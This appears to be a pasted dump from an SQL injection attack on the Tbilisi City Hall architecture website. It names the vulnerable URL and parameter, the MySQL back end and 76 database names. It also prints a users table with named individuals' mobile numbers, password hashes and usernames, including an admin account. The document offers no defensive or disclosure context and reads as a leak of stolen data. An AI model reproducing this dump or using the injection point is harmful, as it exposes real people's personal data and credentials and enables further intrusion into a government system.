.gov Government

.ge Georgia

Tbilisi Municipality City Hall

Tbilisi Architect

https://architect.tbilisi.gov.ge/psite/proj_all.php?id_cat=1

back-end DBMS: MySQL >= 5.0.12

available databases [76]:
[*] agno
[*] allmovies
[*] android
[*] architect
[*] architect_chat
[*] architect_old
[*] artem
[*] articleManager
[*] axaliquchebi
[*] budget
[*] chat
[*] cms
[*] cnpcan
[*] concources
[*] cstbilis_new
[*] dingyetest
[*] eco
[*] eco_architect
[*] fom2011
[*] freedom2011
[*] gamgeobebi
[*] hermes_archive_trash
[*] information_schema
[*] kids_test
[*] kidslaravel
[*] kidsorgge
[*] live_chat
[*] maps
[*] mayor
[*] meladzege
[*] meri
[*] meria_persons
[*] mimdinare_architect
[*] mshvildosnoba
[*] mysql
[*] new_site
[*] newportal
[*] newyear2010geo
[*] ngo
[*] olimpiada
[*] phoenix
[*] poll
[*] portal
[*] portali
[*] projects
[*] qoneba
[*] questions
[*] registration
[*] resume
[*] seragency
[*] staff
[*] streets
[*] tbilisi
[*] tbilisi_ge
[*] tbilisi_portal_2015
[*] tbilisigovge
[*] tbilisigovge_test
[*] tbilisii_inter
[*] tbilisoba2010eng
[*] tbilisoba2010geo
[*] tbilisoba2010rus
[*] teachge_base
[*] teachge_userprogram
[*] testings
[*] testproject
[*] transplantation_cms
[*] tttt
[*] urbana_iko
[*] urbana_iko_eng
[*] urbana_iko_new_competition
[*] urbana_iko_rus
[*] video_site
[*] water_architect
[*] webcam
[*] webpage
[*] works

Database: tbilisigovge
Table: users
[3 entries]
+-----------+----------------------------------+-----------+------------+----------+
| mobile    | password                         | firstname | lastname   | username |
+-----------+----------------------------------+-----------+------------+----------+
| 599066868 | 0b62c281d84fd157d2d662707a6c6e56 | Artem     | Yagutyan   | admin    |
| <blank>   | 8f8cd3503337f26525b06863e68c5fd9 | <blank>   | <blank>    | moder    |
| 595757674 | 07ddb8809560f298b4d1f7b1ae5ae3a3 | Lili      | Kvinikadze | guser    |
+-----------+----------------------------------+-----------+------------+----------+

